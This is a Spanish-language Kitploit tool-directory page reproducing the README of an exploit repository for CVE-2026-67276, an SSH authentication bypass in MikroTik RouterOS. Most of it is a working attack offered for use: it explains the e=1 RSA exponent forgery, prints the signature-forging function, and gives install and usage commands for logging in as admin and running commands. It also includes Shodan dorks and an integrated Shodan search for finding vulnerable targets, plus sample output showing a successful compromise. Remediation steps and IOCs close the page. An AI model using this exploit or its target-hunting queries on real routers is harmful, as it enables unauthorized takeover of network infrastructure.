Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
exploit-mikrotik-2026 — CVE-2026-67276 Exploit de omisión de autenticación SSH en MikroTik RouterOS | Kitploit
Herramientas/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
ReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad de RedesPruebas de PenetraciónAutenticación
GitHub

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
blackhatexploitation/exploit-mikrotik-2026

exploit-mikrotik-2026

CVE-2026-67276 Exploit de omisión de autenticación SSH en MikroTik RouterOS

Ver Repositorio
8278hace 20 díasAún no revisado
Compartir

CVE-2026-67276 - Exploit de Omisión de Autenticación SSH en MikroTik

CVE Severity Type Platform

Omisión de Autenticación de Clave Pública SSH en MikroTik RouterOS - No se Requiere Clave Privada

Una prueba de concepto para CVE-2026-67276 (MikroTrick), una vulnerabilidad crítica de omisión de autenticación en la implementación SSH de MikroTik RouterOS que permite a los atacantes autenticarse como cualquier usuario sin poseer su clave privada.


Tabla de Contenidos

  • Resumen de la Vulnerabilidad
  • Cómo Funciona
  • Versiones Afectadas
  • Instalación
  • Uso
  • Reconocimiento con Shodan
  • Detalles Técnicos
  • Remediación
  • Referencias
  • Aviso Legal

Resumen de la Vulnerabilidad

La Cadena de Ataque MikroTrick

CVE-2026-67276 es parte de una cadena de ataque más amplia denominada "MikroTrick" por CERT PL, que se observó siendo explotada activamente en el mundo real:


Cómo Funciona

La Vulnerabilidad

La autenticación SSH de RouterOS tiene una falla crítica en cómo valida las claves públicas:

  1. Error de Coincidencia de Claves: RouterOS compara el blob de clave pública SSH presentado contra las claves autorizadas usando solo (tipo de clave, módulo), omitiendo por completo el exponente
  2. Exponente del Cliente: La verificación de firma usa el exponente del blob suministrado por el cliente, no la clave almacenada
  3. Falsificación Trivial: Presentar {ssh-rsa, e=1, n=módulo_víctima} hace que la verificación sea trivial

Base Matemática

root@kitploit:~
Verificación RSA Estándar:  sig^65537 mod n == esperado  (requiere clave privada)
Verificación Explotada:     sig^1 mod n == sig           (¡NO se necesita clave privada!)

Con exponente e=1, la verificación de firma se convierte en:

root@kitploit:~
sig^1 mod n == sig

Esto significa que la "firma" es simplemente el mensaje codificado EMSA-PKCS1-v1_5 en sí mismo - construible por cualquiera que conozca el módulo público de la víctima.

Requisitos del Ataque

  1. Nombre de usuario objetivo de una cuenta con una clave RSA autorizada
  2. El módulo público RSA n de esa clave autorizada (del archivo .pub, conexiones anteriores, etc.)
  3. Acceso de red al puerto SSH

Versiones Afectadas

RamaRango VulnerableVersión Parcheada
6.x6.0 - 6.49.206.49.21+

Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# Instalar dependencias
pip install paramiko cryptography

Uso

Inicio Rápido

root@kitploit:~
# Exploit básico - genera clave automáticamente, detecta versión
python3 full_exploit.py --host 192.168.88.1 --username admin

# Ejecutar comando después de la autenticación
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# Puerto personalizado
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

Usando una Clave Pública Existente

root@kitploit:~
# Si tienes el archivo de clave pública de la víctima
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# O proporciona el módulo directamente
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

Detección de Versión

El exploit detecta automáticamente la versión de RouterOS y verifica el estado de vulnerabilidad:

root@kitploit:~
# Forzar exploit incluso en versiones no MikroTik o desconocidas
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

Todas las Opciones

root@kitploit:~
--host              IP/nombre de host RouterOS objetivo (requerido)
--port              Puerto SSH (predeterminado: 22)
--username          Nombre de usuario RouterOS objetivo (requerido)
--pubkey            Archivo de clave pública RSA (se genera automáticamente si no se proporciona)
--modulus-hex       Módulo RSA en hexadecimal (alternativa a --pubkey)
--algos             Algoritmos de firma (predeterminado: ssh-rsa,rsa-sha2-256)
--exec              Comando a ejecutar después de la autenticación
--exp-enc           Codificación del exponente: canónica (1 byte) o alineada (3 bytes)
--timeout           Tiempo de espera de conexión (predeterminado: 15.0 segundos)
--skip-version-check    Omitir verificación de versión de RouterOS
--shodan-dorks      Imprimir consultas de búsqueda de Shodan
--shodan-search     Buscar objetivos en la API de Shodan
--shodan-key        Clave API de Shodan
--shodan-query      Consulta personalizada de Shodan
--shodan-limit      Límite de resultados de Shodan (predeterminado: 100)

Reconocimiento con Shodan

Imprimir Dorks

root@kitploit:~
python3 full_exploit.py --shodan-dorks

Buscar en la API de Shodan

root@kitploit:~
# Búsqueda básica
python3 full_exploit.py --shodan-search --shodan-key TU_CLAVE_API

# Consulta personalizada
python3 full_exploit.py --shodan-search --shodan-key TU_CLAVE --shodan-query 'MikroTik port:22 country:US'

Consultas Útiles de Shodan


Detalles Técnicos

Estructura del Blob de Clave Pública SSH

root@kitploit:~
string    "ssh-rsa"
mpint     e (exponente público)  <- El atacante suministra e=1
mpint     n (módulo)             <- Módulo real de la víctima

Generación de Firma Falsificada

root@kitploit:~
# La "firma" es simplemente los datos de autenticación codificados EMSA-PKCS1-v1_5
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # Esta ES la firma válida cuando e=1

Notas sobre el Formato de Red

  • La cadena de tipo interna del blob permanece como ssh-rsa incluso para algoritmos rsa-sha2-256/512
  • El algoritmo de firma va solo en el campo de algoritmo externo
  • Tanto la codificación canónica (1 byte) como la alineada (3 bytes) de e=1 funcionan en versiones vulnerables

Ejemplo de Salida

root@kitploit:~
[*] Exploit CVE-2026-67276 MikroTrick
[*] Objetivo: 192.168.88.1:22

[*] Detectando versión de RouterOS...
[*] Banner SSH: SSH-2.0-ROSSSH-7.23.3
[*] Versión de RouterOS: 7.23.3
[+] VERSIÓN VULNERABLE - CVE-2026-67276 aplica

[*] Generando par de claves RSA de 2048 bits...
[+] Clave privada guardada: /path/to/exploit_key
[+] Clave pública guardada:  /path/to/exploit_key.pub
[*] Módulo: 2048 bits | e=1 falsificado
[*] Codificación del exponente: canónica (01)

[*] Probando rsa-sha2-256 ...
[+] AUTENTICADO como 'admin' mediante rsa-sha2-256
[+] CVE-2026-67276 CONFIRMADO - el objetivo es vulnerable
--- salida del comando ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

Remediación

1. Actualizar Inmediatamente

root@kitploit:~
# Verificar versión actual
/system resource print

# Actualizar a la versión parcheada
/system package update download
/system reboot

Versiones Mínimas Seguras:

  • Rama 6.x: 6.49.21
  • 7.x estable: 7.23.4
  • 7.x testing: 7.24.2

2. Deshabilitar SSH si No es Necesario

root@kitploit:~
/ip service disable ssh

3. Restringir Acceso SSH

root@kitploit:~
# Por dirección IP
/ip service set ssh address=192.168.88.0/24

# Regla de firewall
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. Verificar Compromiso

root@kitploit:~
# Verificar usuarios sospechosos
/user print

# Verificar usuario "ops" (indicador conocido de atacante)
/user print where name=ops

# Verificar estado de marcado del dispositivo
/system/device-mode/print

# Verificar registros
/log print where topics~"ssh"

IOCs Conocidos:

  • Entradas de registro: login failure for user -2 via ssh
  • Usuario privilegiado desconocido ops
  • Marcador de dispositivo "Flagged"
  • IPs de atacantes: 82.192.72.4, 103.102.31.18

Referencias

  • Aviso de CERT PL
  • Detalles CVE de CERT PL
  • Boletín de Seguridad de MikroTik
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - Uso de Claves RSA con SHA-256/512 en SSH
  • RFC 4252 - Protocolo de Autenticación SSH

Aviso Legal

⚠️ Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos.

  • Úsala solo contra sistemas que poseas o para los que tengas permiso explícito por escrito para probar
  • El acceso no autorizado a sistemas informáticos es ilegal según la CFAA, la Computer Misuse Act y leyes similares en todo el mundo
  • Los autores no son responsables de ningún uso indebido o daño causado por esta herramienta
  • Al usar esta herramienta, aceptas usarla de manera responsable y legal

Licencia

Licencia MIT - Consulta LICENSE para más detalles.


Autor

PoC de Investigación de Seguridad - Implementación de Laboratorio CVE-2026-67276

¡Dale una estrella a este repositorio si te resulta útil!

Descargar herramienta
DetalleInformación
ID CVECVE-2026-67276
SeveridadCrítica (CVSS 9.8)
CWECWE-347 (Verificación Incorrecta de Firma Criptográfica)
Vector de AtaqueRed
AutenticaciónNinguna
ComplejidadBaja
ImpactoCompromiso total del dispositivo
CVETipoDescripción
CVE-2026-67276Omisión de AutenticaciónOmisión de autenticación de clave pública SSH mediante falsificación de exponente
CVE-2026-86060Escalada de PrivilegiosInyección de argumentos mediante nombre de usuario
CVE-2026-67279Omisión de AutenticaciónConexión SSH sin userauth completado
CVE-2026-67277Divulgación de InformaciónFuga de memoria del kernel mediante bandwidth-test
CVE-2026-67278Omisión de FirmaAceptación de firma X.509 malformada
CVE-2026-67281Lectura de ArchivosLectura de archivos raíz en WebFig mediante jsproxy
7.x estable
7.0 - 7.23.3
7.23.4+
7.x testing7.24.0 - 7.24.17.24.2+
ObjetivoConsulta
Todos los MikroTikMikroTik
MikroTik SSHMikroTik port:22
Winbox Expuestoport:8291
Panel WebFighttp.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
Por PaísMikroTik country:US
Pista de VulnerabilidadMikroTik ("6.49" OR "7.23" OR "7.24.0")